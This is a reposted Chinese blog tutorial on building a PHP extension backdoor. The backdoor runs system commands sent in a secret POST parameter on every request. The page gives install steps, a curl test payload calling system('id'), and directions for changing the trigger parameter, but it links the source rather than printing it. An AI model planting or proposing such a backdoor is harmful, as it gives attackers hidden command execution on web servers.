2. 程式人生 > >linux 編寫 php擴充套件 小實驗

linux 編寫 php擴充套件 小實驗

阿新 發佈:2018-11-16

環境 Ubuntu 16.04, PHP 5.6

php擴充套件後門小實驗

git: https://github.com/Gekkoou/php-extension-backdoor

利用了 PHP SAPI 的生命週期, 當有請求的時候, 呼叫一次所有模組的請求初始化函式(PHP_RINIT_FUNCTION), 然後執行POST過來指定引數的命令. 當然這只是簡單的用法, 複雜的隱匿性高的可以去深入研究一下.

編譯安裝

# phpize && ./configure && make && sudo make install

修改配置檔案 php.ini, 增加 extension=backdoor.so

重啟PHP服務 srevice php-fpm restart

測試

# curl http://localhost/index.php --data "execute=system('id');"
uid=1002(www) gid=1002(www) groups=1002(www)

自定義POST引數

修改檔案 backdoor.c

char* secret_string = "execute";
# char* secret_string = "POST引數";




相關推薦

linux 編寫 php擴充套件 實驗

環境 Ubuntu 16.04, PHP 5.6 php擴充套件後門小實驗 git: https://github.com/Gekkoou/php-extension-backdoor 利用了 PHP SAPI 的生命週期, 當有請求的時候, 呼叫一次所有模組的

linux zephir 編寫 php 擴充套件 (docker篇)

鑑於編譯各版本的PHP擴充套件, 需要安裝與切換不同PHP版本後進行編譯, 很麻煩, 於是有了用 docker 編譯的想法. 搜尋相關資源發現已經有很多大牛們寫出來了, 就不重複造輪子了(其實就是自己菜寫不出) 方法1 不BB, 直接放程式碼, p神寫的 ze

Linux-LNMP-PHP擴充套件模組安裝

/usr/local/php/bin/php -m //檢視模組 下面安裝一個redis的模組cd /usr/local/src/ wget https://codeload.github.com/phpredis/phpredis/zip/develop mv develop phpredis-dev

linux 配置 php 擴充套件curl

程式執行的時候遇到這個問題 我是在linux上執行的,發現好多朋友是在windows遇到的這個問題,我記錄一下; Fatal error: Call to undefined function curl_init() in /home/family/family/bbs

linuxphp擴充套件curl的安裝

背景,在一段模擬curl的php程式程式碼出現了 Fatal error: Call to undefined function curl_init(), 經過查詢原因,發現了是php在安裝時配置configure沒有擴充套件curl外掛,那麼有啥方法可以解決這個問題呢

linux 安裝php擴充套件記錄

學習laravel過程中,我需要開啟xdebug進行除錯,然後xdebug官網看了下說明,linux系統下需要編譯安裝,配置php.ini 官網地址:xdebug 具體過程: 下載官

Linux增加php擴充套件gd庫

php擴充套件gd庫 Compile Error 伺服器編譯問題 重啟php服務 php擴充套件安裝 gd 庫 當執行完apt-get 命令後 gd.so 會出現在 /usr/lib/

Linuxphp swoole擴充套件安裝

1、安裝swoole cd /usr/local/src wget  http://pecl.php.net/get/swoole-2.0.7.tgz tar zxvf  swoole-2.0.7.tgz cd&nbs

linux下安裝redis服務和php擴充套件

一:安裝redis服務 1、wget http://download.redis.io/releases/redis-5.0.0.tar.gz 2、tar xzf redis-5.0.0.tar.gz 3、cd redis-5.0.0 4、yum -y install gcc 5

linux環境php安裝solr擴充套件(親測總結)

1、從http://pecl.php.net/package/solr下載最新版本。 我下載到/usr/tmp      cd /usr/tmp   wget https://pecl.php.net/get/solr-2.4.0.tgz

linux安裝redis php擴充套件,簡單幾步解決問題

在linux系統安裝php的redis擴充套件的簡單幾個步驟,按順序安裝即可 php redis擴充套件安裝 cd /usr/local/src wget https://pecl.php.net/get/redis-4.0.0.tgz tar zxvf redis-4.0.0.tgz cd r

linux php 擴充套件環境的安裝 fastcgi

php 在windows 作業系統下新增擴充套件很方便,只需要在php.ini 中將目標擴充套件的extension 前面的“;”去掉或是將下載的擴充套件放入ext擴充套件目錄下面並在php.ini中新增擴充套件(extension=擴充套件.dll)就可以了。 那麼在Linux操作環

Linux逆向---可執行檔案程式碼靜態注入實驗

分析完節頭之後,我最大的收穫就是,這麼多的01,並不是所有的都是用來執行我寫的那段輸出helloworld的程式的,而且程式碼段中有很大一段空閒空間,這就給我們一個向可執行檔案中注入自己程式碼,然後通過修改程式邏輯達到讓它去執行我們自己寫的的部分的程式碼的邏輯的機會。 這裡我們的原始碼是

Linux環境下安裝PHP擴充套件Swoole

 1、簡介 Swoole可以廣泛應用於網際網路、行動通訊、企業軟體、網路遊戲、物聯網、車聯網、智慧家庭等領域。 使用PHP+Swoole作為網路通訊框架,可以使企業IT研發團隊的效率大大提升,更加專注於開發創新產品。 Swoole底層內建了非同步非阻塞、多執行

Linux下面安裝PHP擴充套件

Linux是程式設計師部署網站都會用到的系統,PHP的環境經常也會搭建在上面,PHP開發過程中會使用到很多擴充套件,有的時候部署一個網站在上面的時候,會提示你沒有擴充套件,比如沒有gd庫,這是一個影象處理相關的擴充套件。 大家第一反應就是再去下載一個擴充套件,這樣其實很麻煩,其實在原有的PHP

Linuxphp安裝Redis擴充套件(其他擴充套件同理)

1、cd  /usr/local/src/  切換到 3、tar zxvf   2.2.4.tar.gz  解壓檔案 4、cd  phpredis-2.2.4      #進入安裝目錄 5 、/usr/local/php/bin/phpize    # 使用 php

linuxphp安裝完成後如何整合mysql擴充套件

問題背景 平常我們都是先安裝mysql,然後才能去安裝php。假如先安裝php,後安裝mysql,由於php需要連線mysql,因而在php引擎中需要配置使用mysql.so擴充套件。這時需要手動編譯生成mysql.so擴充套件。解決方案 使用phpize工具能夠生成mysq

Linuxphp新增memcache擴充套件

很多時候我們都會遇到在已經安裝的php中新增其它的擴充套件。 那我們應該怎麼做呢? 這樣做。(我們的nginx和php都是已經安裝好了的,這裡就不做贅述了) 首先,我們需要下載php的memcache擴充套件包。 wget http://pecl.php.net/get/memcache-2

LinuxPHP Version 7.0.1 mongodb服務端和擴充套件的安裝

再次主要介紹服務端的安裝步驟,客戶端擴充套件簡單介紹下就行,可以直接使用此連結的編譯安裝包,下載地址http://download.csdn.net/download/jzj_xhj/102662221:放置在 /opt/php-7.0.7/lib/php/extension

linux php 擴充套件包 下載地址

autoconf-2.68.tar.gz http://ftp.gnu.org/gnu/autoconf/eaccelerator-0.9.6.tar.bz2 (PHP擴充套件) http://bart.eaccelerator.net/source/freetype-2